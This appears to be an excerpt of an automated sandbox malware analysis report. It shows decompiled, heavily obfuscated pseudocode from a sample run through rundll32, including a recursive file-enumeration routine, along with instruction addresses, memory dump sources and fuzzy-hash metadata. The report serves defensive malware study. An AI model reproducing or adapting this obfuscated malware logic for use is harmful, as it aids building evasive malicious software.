				_v68 = _v68 ^ 0x9bceaa07;
				_v68 = _v68 ^ 0xa855990f;
				_v56 = 0xa2136b;
				_v56 = _v56 + 0x4ebb;
				_v56 = _v56 ^ 0x00a98962;
				_v32 = 0x51a57b;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 ^ 0x0002096e;
				_v48 = 0x9fd766;
				_v48 = _v48 | 0x00a10b6a;
				_v48 = _v48 ^ 0x00bfd9fa;
				do {
					while(_t375 != _t358) {
						if(_t375 == 0x79707ab) {
							_t375 = 0x7c4530c;
							continue;
						} else {
							if(_t375 == 0x7c4530c) {
								_push(_v156);
								_push(_v96);
								_push(0x341678);
								_t366 = E0034AB66(_v88, _v80, __eflags);
								_push(_v28);
								_push(_v116);
								_t302 =  &_v148; // 0x372e6b7a
								_push(0x341538);
								__eflags = E00350EDA(E0034AB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
								E0034AE03(_v132, _v100, _v108, _t366);
								E0034AE03(_v20, _v92, _v44, _t367);
								_t426 = _v12;
								_t431 =  &(_t431[0xf]);
								L10:
								_t358 = 0x5786d8d;
								goto L11;
							} else {
								if(_t375 != 0xfc0b370) {
									goto L11;
								} else {
									E00347027(_v32, _v40, _v16, _v48);
								}
							}
						}
						L6:
						return _t430;
					}
					_push(_v84);
					_push(_v160);
					_push(0x341588);
					_t359 = E0034AB66(_v144, _v152, __eflags);
					_t360 =  *0x365c9c; // 0x0
					__eflags = E0035F9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
					_t375 = 0xfc0b370;
					_t430 =  ==  ? 1 : _t430;
					E0034AE03(_v104, _v68, _v56, _t359);
					_t431 =  &(_t431[0xf]);
					goto L10;
					L11:
					__eflags = _t375 - 0xbb932f6;
				} while (__eflags != 0);
				goto L6;
			}



























































                                                                                                                      0x0035acd3
                                                                                                                      0x0035acdd
                                                                                                                      0x0035acdf
                                                                                                                      0x0035ace6
                                                                                                                      0x0035acf3
                                                                                                                      0x0035acf5
                                                                                                                      0x0035acfa
                                                                                                                      0x0035ad01
                                                                                                                      0x0035ad09
                                                                                                                      0x0035ad0e
                                                                                                                      0x0035ad16
                                                                                                                      0x0035ad25
                                                                                                                      0x0035ad29
                                                                                                                      0x0035ad2e
                                                                                                                      0x0035ad33
                                                                                                                      0x0035ad3b
                                                                                                                      0x0035ad43
                                                                                                                      0x0035ad4b
                                                                                                                      0x0035ad50
                                                                                                                      0x0035ad58
                                                                                                                      0x0035ad64
                                                                                                                      0x0035ad69
                                                                                                                      0x0035ad6f
                                                                                                                      0x0035ad77
                                                                                                                      0x0035ad89
                                                                                                                      0x0035ad8e
                                                                                                                      0x0035ad97
                                                                                                                      0x0035ada2
                                                                                                                      0x0035adaa
                                                                                                                      0x0035adaf
                                                                                                                      0x0035adb7
                                                                                                                      0x0035adbf
                                                                                                                      0x0035adc7
                                                                                                                      0x0035add0
                                                                                                                      0x0035add5
                                                                                                                      0x0035addb
                                                                                                                      0x0035ade3
                                                                                                                      0x0035adeb
                                                                                                                      0x0035adf5
                                                                                                                      0x0035adf6
                                                                                                                      0x0035adfa
                                                                                                                      0x0035ae02
                                                                                                                      0x0035ae10
                                                                                                                      0x0035ae14
                                                                                                                      0x0035ae21
                                                                                                                      0x0035ae25
                                                                                                                      0x0035ae2d
                                                                                                                      0x0035ae35
                                                                                                                      0x0035ae3a
                                                                                                                      0x0035ae42
                                                                                                                      0x0035ae4a
                                                                                                                      0x0035ae52
                                                                                                                      0x0035ae57
                                                                                                                      0x0035ae5f
                                                                                                                      0x0035ae64
                                                                                                                      0x0035ae6c
                                                                                                                      0x0035ae74
                                                                                                                      0x0035ae84
                                                                                                                      0x0035ae89
                                                                                                                      0x0035ae8f
                                                                                                                      0x0035ae97
                                                                                                                      0x0035ae9f
                                                                                                                      0x0035aeaa
                                                                                                                      0x0035aeb2
                                                                                                                      0x0035aebd
                                                                                                                      0x0035aec5
                                                                                                                      0x0035aecd
                                                                                                                      0x0035aed5
                                                                                                                      0x0035aeda
                                                                                                                      0x0035aee2
                                                                                                                      0x0035aeed
                                                                                                                      0x0035aef8
                                                                                                                      0x0035af03
                                                                                                                      0x0035af16
                                                                                                                      0x0035af19
                                                                                                                      0x0035af20
                                                                                                                      0x0035af2b
                                                                                                                      0x0035af38
                                                                                                                      0x0035af3c
                                                                                                                      0x0035af41
                                                                                                                      0x0035af46
                                                                                                                      0x0035af4e
                                                                                                                      0x0035af56
                                                                                                                      0x0035af5e
                                                                                                                      0x0035af63
                                                                                                                      0x0035af6b
                                                                                                                      0x0035af73
                                                                                                                      0x0035af78
                                                                                                                      0x0035af80
                                                                                                                      0x0035af88
                                                                                                                      0x0035af90
                                                                                                                      0x0035af9b
                                                                                                                      0x0035afa6
                                                                                                                      0x0035afb1
                                                                                                                      0x0035afb9
                                                                                                                      0x0035afbd
                                                                                                                      0x0035afc2
                                                                                                                      0x0035afca
                                                                                                                      0x0035afd5
                                                                                                                      0x0035afe0
                                                                                                                      0x0035afeb
                                                                                                                      0x0035aff3
                                                                                                                      0x0035affb
                                                                                                                      0x0035b000
                                                                                                                      0x0035b005
                                                                                                                      0x0035b00d
                                                                                                                      0x0035b015
                                                                                                                      0x0035b01b
                                                                                                                      0x0035b01c
                                                                                                                      0x0035b029
                                                                                                                      0x0035b02d
                                                                                                                      0x0035b035
                                                                                                                      0x0035b03d
                                                                                                                      0x0035b045
                                                                                                                      0x0035b04d
                                                                                                                      0x0035b052
                                                                                                                      0x0035b05a
                                                                                                                      0x0035b062
                                                                                                                      0x0035b06a
                                                                                                                      0x0035b075
                                                                                                                      0x0035b076
                                                                                                                      0x0035b07a
                                                                                                                      0x0035b084
                                                                                                                      0x0035b08c
                                                                                                                      0x0035b092
                                                                                                                      0x0035b096
                                                                                                                      0x0035b09b
                                                                                                                      0x0035b0a3
                                                                                                                      0x0035b0ab
                                                                                                                      0x0035b0b3
                                                                                                                      0x0035b0c0
                                                                                                                      0x0035b0c4
                                                                                                                      0x0035b0cc
                                                                                                                      0x0035b0d4
                                                                                                                      0x0035b0e1
                                                                                                                      0x0035b0e5
                                                                                                                      0x0035b0ed
                                                                                                                      0x0035b0f5
                                                                                                                      0x0035b100
                                                                                                                      0x0035b108
                                                                                                                      0x0035b113
                                                                                                                      0x0035b11b
                                                                                                                      0x0035b120
                                                                                                                      0x0035b125
                                                                                                                      0x0035b12d
                                                                                                                      0x0035b135
                                                                                                                      0x0035b13d
                                                                                                                      0x0035b147
                                                                                                                      0x0035b14b
                                                                                                                      0x0035b150
                                                                                                                      0x0035b158
                                                                                                                      0x0035b160
                                                                                                                      0x0035b168
                                                                                                                      0x0035b170
                                                                                                                      0x0035b178
                                                                                                                      0x0035b180
                                                                                                                      0x0035b188
                                                                                                                      0x0035b190
                                                                                                                      0x0035b198
                                                                                                                      0x0035b1a3
                                                                                                                      0x0035b1ab
                                                                                                                      0x0035b1b6
                                                                                                                      0x0035b1c1
                                                                                                                      0x0035b1cc
                                                                                                                      0x0035b1d7
                                                                                                                      0x0035b1d7
                                                                                                                      0x0035b1e5
                                                                                                                      0x0035b2e7
                                                                                                                      0x00000000
                                                                                                                      0x0035b1eb
                                                                                                                      0x0035b1f1
                                                                                                                      0x0035b22f
                                                                                                                      0x0035b233
                                                                                                                      0x0035b23f
                                                                                                                      0x0035b244
                                                                                                                      0x0035b249
                                                                                                                      0x0035b252
                                                                                                                      0x0035b256
                                                                                                                      0x0035b25e
                                                                                                                      0x0035b29e
                                                                                                                      0x0035b2b5
                                                                                                                      0x0035b2b8
                                                                                                                      0x0035b2d3
                                                                                                                      0x0035b2d8
                                                                                                                      0x0035b2df
                                                                                                                      0x0035b37b
                                                                                                                      0x0035b37b
                                                                                                                      0x00000000
                                                                                                                      0x0035b1f3
                                                                                                                      0x0035b1f9
                                                                                                                      0x00000000
                                                                                                                      0x0035b1ff
                                                                                                                      0x0035b21b
                                                                                                                      0x0035b221
                                                                                                                      0x0035b1f9
                                                                                                                      0x0035b1f1
                                                                                                                      0x0035b224
                                                                                                                      0x0035b22e
                                                                                                                      0x0035b22e
                                                                                                                      0x0035b2f1
                                                                                                                      0x0035b2f5
                                                                                                                      0x0035b301
                                                                                                                      0x0035b306
                                                                                                                      0x0035b310
                                                                                                                      0x0035b356
                                                                                                                      0x0035b358
                                                                                                                      0x0035b365
                                                                                                                      0x0035b373
                                                                                                                      0x0035b378
                                                                                                                      0x00000000
                                                                                                                      0x0035b380
                                                                                                                      0x0035b380
                                                                                                                      0x0035b380
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: 88f8edaffffee8c8fa6649ea918b3d963a89421b38ee3ec17d0a9dd3bcd70659
                                                                                                                      • Instruction ID: 024c9b4a1ef9d72b0dfd2ee4df083907b394b452667d68de91e86fc67b9269ec
                                                                                                                      • Opcode Fuzzy Hash: 88f8edaffffee8c8fa6649ea918b3d963a89421b38ee3ec17d0a9dd3bcd70659
                                                                                                                      • Instruction Fuzzy Hash: 82F10D715083809FD7A9CF25D48AA4BFBE2FBC0748F10891DF59A8A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00341950 Relevance: 10.3, Strings: 8, Instructions: 345COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E00341950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t335;
				signed int _t360;
				signed int _t362;
				intOrPtr _t371;
				void* _t373;
				signed int _t379;
				void* _t406;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				void* _t426;
				void* _t427;

				_t371 = _a8;
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t371);
					_push(_a4);
					_push(__edx);
					_push(__ecx);
					E0034CF25(_t335);
					_v16 = 0x6f572e;
				}
				_t427 = _t426 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t418 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t418;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t419 = 0x7c;
				_v80 = _v80 / _t419;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t420 = 0x3a;
				_v48 = _v48 / _t420;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t421 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t421;
				_t422 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t422;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t423 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t417 = _v100;
				_v52 = _v52 / _t423;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L5:
					_t406 = 0x2e;
					L6:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t371;
							_t373 = 0xcf103a;
							continue;
						}
						if(_t373 == 0x8bdeaee) {
							__eflags = _v768 & _v16;
							if(__eflags == 0) {
								_t360 = _a16( &_v768,  &_v176);
								asm("sbb ecx, ecx");
								_t379 =  ~_t360 & 0x01058edd;
								L13:
								_t373 = _t379 + 0xe9f3001;
								while(1) {
									L5:
									_t406 = 0x2e;
									goto L6;
								}
							} else {
								__eflags = _v724 - _t406;
								if(_v724 != _t406) {
									L22:
									__eflags = _a4;
									if(__eflags != 0) {
										_push(_v48);
										_push(_v80);
										_push(0x341264);
										E0034E7CE(E0034AB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
										_t310 =  &_a12; // 0xee6f0a5e
										E00341950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
										_t427 = _t427 + 0x40;
										_t362 = E0034AE03(_v20, _v76, _v12, _t365);
										_t406 = 0x2e;
									}
								} else {
									__eflags = _v722;
									if(__eflags != 0) {
										__eflags = _v722 - _t406;
										if(_v722 != _t406) {
											goto L22;
										} else {
											__eflags = _v720;
											if(__eflags != 0) {
												goto L22;
											}
										}
									}
								}
								_t373 = 0xfa4bede;
								continue;
							}
							L31:
						}
						if(_t373 != 0x8fff290) {
							if(_t373 == 0xe9f3001) {
								return E00358C35(_v100, _t417, _v96, _v52, _v44);
							}
							if(_t373 != 0xfa4bede) {
								L27:
								__eflags = _t373 - 0x71f77cc;
								if(__eflags != 0) {
									continue;
								} else {
									return _t362;
								}
								goto L31;
							} else {
								_t277 =  &_v768; // 0x15f5595f
								_t362 = E0035F7FC(_v136, _t417, _v116, _t277);
								asm("sbb ecx, ecx");
								_t379 =  ~_t362 & 0xfa1ebaed;
								goto L13;
							}
						}
						_t362 = E0035BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
						_t417 = _t362;
						_t427 = _t427 + 0xc;
						__eflags = _t362 - 0xffffffff;
						if(__eflags != 0) {
							_t373 = 0x8bdeaee;
							goto L5;
						}
						return _t362;
						goto L31;
					}
					_push(_v92);
					_push(_v108);
					_push(0x3412d4);
					E00343BF8(_v28, __eflags, E0034AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
					E0034AE03(_v128, _v36, _v120, _t353);
					_t427 = _t427 + 0x28;
					_t373 = 0x8fff290;
					_t406 = 0x2e;
					goto L27;
				}
			}






























































                                                                                                                      0x0034195a
                                                                                                                      0x0034195f
                                                                                                                      0x00341960
                                                                                                                      0x00341962
                                                                                                                      0x00341965
                                                                                                                      0x00341968
                                                                                                                      0x00341969
                                                                                                                      0x0034196c
                                                                                                                      0x0034196d
                                                                                                                      0x0034196e
                                                                                                                      0x00341973
                                                                                                                      0x00341973
                                                                                                                      0x0034197a
                                                                                                                      0x0034197d
                                                                                                                      0x00341983
                                                                                                                      0x0034198a
                                                                                                                      0x0034198f
                                                                                                                      0x00341996
                                                                                                                      0x0034199d
                                                                                                                      0x003419a4
                                                                                                                      0x003419b1
                                                                                                                      0x003419b2
                                                                                                                      0x003419b5
                                                                                                                      0x003419bc
                                                                                                                      0x003419c3
                                                                                                                      0x003419ca
                                                                                                                      0x003419d1
                                                                                                                      0x003419d8
                                                                                                                      0x003419dc
                                                                                                                      0x003419e3
                                                                                                                      0x003419ea
                                                                                                                      0x003419f1
                                                                                                                      0x003419f8
                                                                                                                      0x003419ff
                                                                                                                      0x00341a06
                                                                                                                      0x00341a0d
                                                                                                                      0x00341a11
                                                                                                                      0x00341a18
                                                                                                                      0x00341a1f
                                                                                                                      0x00341a26
                                                                                                                      0x00341a2d
                                                                                                                      0x00341a34
                                                                                                                      0x00341a3b
                                                                                                                      0x00341a42
                                                                                                                      0x00341a4e
                                                                                                                      0x00341a51
                                                                                                                      0x00341a58
                                                                                                                      0x00341a5f
                                                                                                                      0x00341a66
                                                                                                                      0x00341a6d
                                                                                                                      0x00341a74
                                                                                                                      0x00341a7b
                                                                                                                      0x00341a82
                                                                                                                      0x00341a89
                                                                                                                      0x00341a90
                                                                                                                      0x00341a97
                                                                                                                      0x00341a9b
                                                                                                                      0x00341a9f
                                                                                                                      0x00341aa6
                                                                                                                      0x00341aad
                                                                                                                      0x00341ab4
                                                                                                                      0x00341abb
                                                                                                                      0x00341ac5
                                                                                                                      0x00341acf
                                                                                                                      0x00341ad9
                                                                                                                      0x00341ae0
                                                                                                                      0x00341ae7
                                                                                                                      0x00341aee
                                                                                                                      0x00341af8
                                                                                                                      0x00341b02
                                                                                                                      0x00341b0c
                                                                                                                      0x00341b16
                                                                                                                      0x00341b20
                                                                                                                      0x00341b2a
                                                                                                                      0x00341b31
                                                                                                                      0x00341b35
                                                                                                                      0x00341b3e
                                                                                                                      0x00341b4a
                                                                                                                      0x00341b4f
                                                                                                                      0x00341b54
                                                                                                                      0x00341b5b
                                                                                                                      0x00341b62
                                                                                                                      0x00341b6c
                                                                                                                      0x00341b71
                                                                                                                      0x00341b76
                                                                                                                      0x00341b7d
                                                                                                                      0x00341b81
                                                                                                                      0x00341b88
                                                                                                                      0x00341b93
                                                                                                                      0x00341b96
                                                                                                                      0x00341b99
                                                                                                                      0x00341ba0
                                                                                                                      0x00341bae
                                                                                                                      0x00341bb5
                                                                                                                      0x00341bb6
                                                                                                                      0x00341bb9
                                                                                                                      0x00341bc0
                                                                                                                      0x00341bc7
                                                                                                                      0x00341bcb
                                                                                                                      0x00341bd2
                                                                                                                      0x00341bd9
                                                                                                                      0x00341be0
                                                                                                                      0x00341be7
                                                                                                                      0x00341beb
                                                                                                                      0x00341bef
                                                                                                                      0x00341bf6
                                                                                                                      0x00341bfd
                                                                                                                      0x00341c01
                                                                                                                      0x00341c08
                                                                                                                      0x00341c0f
                                                                                                                      0x00341c16
                                                                                                                      0x00341c1d
                                                                                                                      0x00341c24
                                                                                                                      0x00341c2b
                                                                                                                      0x00341c32
                                                                                                                      0x00341c3c
                                                                                                                      0x00341c46
                                                                                                                      0x00341c50
                                                                                                                      0x00341c5c
                                                                                                                      0x00341c5f
                                                                                                                      0x00341c6a
                                                                                                                      0x00341c6d
                                                                                                                      0x00341c74
                                                                                                                      0x00341c7b
                                                                                                                      0x00341c7f
                                                                                                                      0x00341c86
                                                                                                                      0x00341c8d
                                                                                                                      0x00341c94
                                                                                                                      0x00341c9b
                                                                                                                      0x00341ca2
                                                                                                                      0x00341ca9
                                                                                                                      0x00341cb0
                                                                                                                      0x00341cb7
                                                                                                                      0x00341cbe
                                                                                                                      0x00341cc5
                                                                                                                      0x00341cc9
                                                                                                                      0x00341cd0
                                                                                                                      0x00341cda
                                                                                                                      0x00341ce6
                                                                                                                      0x00341cf0
                                                                                                                      0x00341cf7
                                                                                                                      0x00341cfe
                                                                                                                      0x00341d05
                                                                                                                      0x00341d12
                                                                                                                      0x00341d13
                                                                                                                      0x00341d16
                                                                                                                      0x00341d1d
                                                                                                                      0x00341d24
                                                                                                                      0x00341d28
                                                                                                                      0x00341d2f
                                                                                                                      0x00341d36
                                                                                                                      0x00341d42
                                                                                                                      0x00341d45
                                                                                                                      0x00341d48
                                                                                                                      0x00341d4f
                                                                                                                      0x00341d56
                                                                                                                      0x00341d5d
                                                                                                                      0x00341d64
                                                                                                                      0x00341d6b
                                                                                                                      0x00341d6f
                                                                                                                      0x00341d76
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d80
                                                                                                                      0x00341d92
                                                                                                                      0x00341f11
                                                                                                                      0x00341f17
                                                                                                                      0x00000000
                                                                                                                      0x00341f17
                                                                                                                      0x00341d9e
                                                                                                                      0x00341e2d
                                                                                                                      0x00341e33
                                                                                                                      0x00341efd
                                                                                                                      0x00341f04
                                                                                                                      0x00341f06
                                                                                                                      0x00341de9
                                                                                                                      0x00341de9
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d7f
                                                                                                                      0x00341e39
                                                                                                                      0x00341e39
                                                                                                                      0x00341e40
                                                                                                                      0x00341e69
                                                                                                                      0x00341e69
                                                                                                                      0x00341e6d
                                                                                                                      0x00341e6f
                                                                                                                      0x00341e72
                                                                                                                      0x00341e7e
                                                                                                                      0x00341ead
                                                                                                                      0x00341ec7
                                                                                                                      0x00341ece
                                                                                                                      0x00341ed3
                                                                                                                      0x00341ee0
                                                                                                                      0x00341ee9
                                                                                                                      0x00341ee9
                                                                                                                      0x00341e42
                                                                                                                      0x00341e42
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e4c
                                                                                                                      0x00341e53
                                                                                                                      0x00000000
                                                                                                                      0x00341e55
                                                                                                                      0x00341e55
                                                                                                                      0x00341e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341e5d
                                                                                                                      0x00341e53
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e33
                                                                                                                      0x00341daa
                                                                                                                      0x00341db2
                                                                                                                      0x00000000
                                                                                                                      0x00341f91
                                                                                                                      0x00341dbe
                                                                                                                      0x00341f70
                                                                                                                      0x00341f70
                                                                                                                      0x00341f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dd6
                                                                                                                      0x00341de1
                                                                                                                      0x00341de3
                                                                                                                      0x00000000
                                                                                                                      0x00341de3
                                                                                                                      0x00341dbe
                                                                                                                      0x00341e0d
                                                                                                                      0x00341e12
                                                                                                                      0x00341e14
                                                                                                                      0x00341e17
                                                                                                                      0x00341e1a
                                                                                                                      0x00341e20
                                                                                                                      0x00000000
                                                                                                                      0x00341e20
                                                                                                                      0x00341f9a
                                                                                                                      0x00000000
                                                                                                                      0x00341f9a
                                                                                                                      0x00341f21
                                                                                                                      0x00341f24
                                                                                                                      0x00341f2d
                                                                                                                      0x00341f51
                                                                                                                      0x00341f60
                                                                                                                      0x00341f65
                                                                                                                      0x00341f68
                                                                                                                      0x00341f6f
                                                                                                                      0x00000000
                                                                                                                      0x00341f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
